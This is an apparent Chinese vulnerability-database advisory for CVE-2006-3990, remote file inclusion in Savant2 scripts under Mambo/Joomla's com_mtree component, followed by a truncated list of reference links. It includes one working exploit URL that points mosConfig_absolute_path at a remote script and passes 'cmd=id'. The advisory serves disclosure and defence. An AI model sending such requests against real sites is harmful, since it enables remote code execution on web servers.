Paul M. Jones Savant2 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110677 漏洞类型 输入验证
发布时间 2006-07-25 更新时间 2006-08-08
CVE编号 CVE-2006-3990 CNNVD-ID CNNVD-200608-064
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28273
https://cxsecurity.com/issue/WLB-2006080033
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-064
|漏洞详情
PaulM.JonesSavant2存在多个PHP远程文件包含漏洞,可能在与Mambo和Joomla软件的com_mtree组件一起使用时,远程攻击者可借助以下脚本的mosConfig_absolute_path参数中的URL执行任意PHP代码:(1)Savant2_Plugin_stylesheet.php,(2)Savant2_Compiler_basic.php,(3)Savant2_Error_pear.php,(4)Savant2_Error_stack.php,(5)Savant2_Filter_colorizeCode.php,(6)Savant2_Filter_trimwhitespace.php,(7)Savant2_Plugin_ahref.php,(8)Savant2_Plugin_ahrefcontact.php,(9)Savant2_Plugin_ahreflisting.php,(10)Savant2_Plugin_ahreflistingimage.php,(11)Savant2_Plugin_ahrefmap.php,(12)Savant2_Plugin_ahrefownerlisting.php,(13)Savant2_Plugin_ahrefprint.php,(14)Savant2_Plugin_ahrefrating.php,(15)Savant2_Plugin_ahrefrecommend.php,(16)Savant2_Plugin_ahrefreport.php,(17)Savant2_Plugin_ahrefreview.php,(18)Savant2_Plugin_ahrefvisit.php,(19)Savant2_Plugin_checkbox.php,(20)Savant2_Plugin_cycle.php,(21)Savant2_Plugin_dateformat.php,(22)Savant2_Plugin_editor.php,(23)Savant2_Plugin_form.php,(24)Savant2_Plugin_image.php,(25)Savant2_Plugin_input.php,(26)Savant2_Plugin_javascript.php,(27)Savant2_Plugin_li
|漏洞EXP
source: http://www.securityfocus.com/bid/19151/info

Savant2 is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

http://www.example.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id
|参考资料

来源:XF
名称:savant-multiple-plugin-file-include(27906)
链接:http://xforce.iss.net/xforce/xfdb/27906
来源:BID
名称:19151
链接:http://www.securityfocus.com/bid/19151
来源:BUGTRAQ
名称:20060721[KurdishSecurity#13]Savant2RemoteFileIncludeVulnerability[ForMambo,Joomla]
链接:http://www.securityfocus.com/archive/1/archive/1/440835/100/200/threaded
来源:SECTRACK
名称:1016560
链接:http://securitytracker.com/id?1016560
来源:OSVDB
名称:28712
链接:http://www.osvdb.org/28712
来源:OSVDB
名称:28711
链接:http://www.osvdb.org/28711
来源:OSVDB
名称:28710
链接:http://www.osvdb.org/28710
来源:OSVDB
名称:28709
链接:http://www.osvdb.org/28709
来源:OSVDB
名称:28708
链接:http://www.osvdb.org/28708
来源:OSVDB
名称:28707
链接:http://www.osvdb.org/28707
来源:OSVDB
名称:28706
链接:http://www.osvdb.org/28706
来源:OSVDB
名称:28705
链接:http://www.osvdb.org/28705
来源:OSVDB
名称:28704
链接:http://www.osvdb.org/28704
来源:OSVDB
名称:28703
链接:http://www.osvdb.org/28703
来源:OSVDB
名称:28702
链接:http://www.osvdb.org/28702
来源:OSVDB
名称:28701
链接:http://www.osvdb.org/28701
来源:OSVDB
名称:28700
链接:http://www.o